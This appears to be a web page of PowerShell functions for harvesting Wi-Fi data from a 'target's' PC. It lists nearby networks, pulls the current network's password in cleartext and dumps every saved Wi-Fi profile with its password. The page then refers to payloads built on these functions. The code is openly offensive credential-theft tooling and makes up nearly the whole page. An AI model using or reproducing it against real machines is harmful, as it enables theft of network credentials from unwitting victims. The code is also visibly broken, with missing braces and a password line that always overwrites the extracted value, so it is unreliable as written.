Table of Contents
These functions will help you enumerate your targets wifi, and the wifi nearby
This quick snippet will get you the wifi connections visible from your targets PC
$NearbyNetworks = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
This first function will get you the SSID and Password the target PC is currently connected to and save it to the variable $CurrentNetwork
function Get-CurrentNetwork {
$pro = netsh wlan show interface | Select-String -Pattern ' SSID '; $pro = [string]$pro;$pos = $pro.IndexOf(':');$pro = $pro.Substring($pos+2).Trim()
$pass = netsh wlan show profile $pro key=clear | Select-String -Pattern 'Key Content'; $pass = [string]$pass;$passPOS = $pass.IndexOf(':');$pass = $pass.Substring($passPOS+2).Trim()
return "$pro : $pass"
$CurrentNetwork = Get-CurrentNetwork
This function will get you a list of all the wifi networks your target has joined and their passwords and save it to the variable $Networks
Function Get-Networks {
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get Wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
$WLANProfilePassword = "The password is not stored in this profile"
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
return $WLANProfileObjects
$Networks = Get-Networks
Listed below are payloads that have used one of these functions: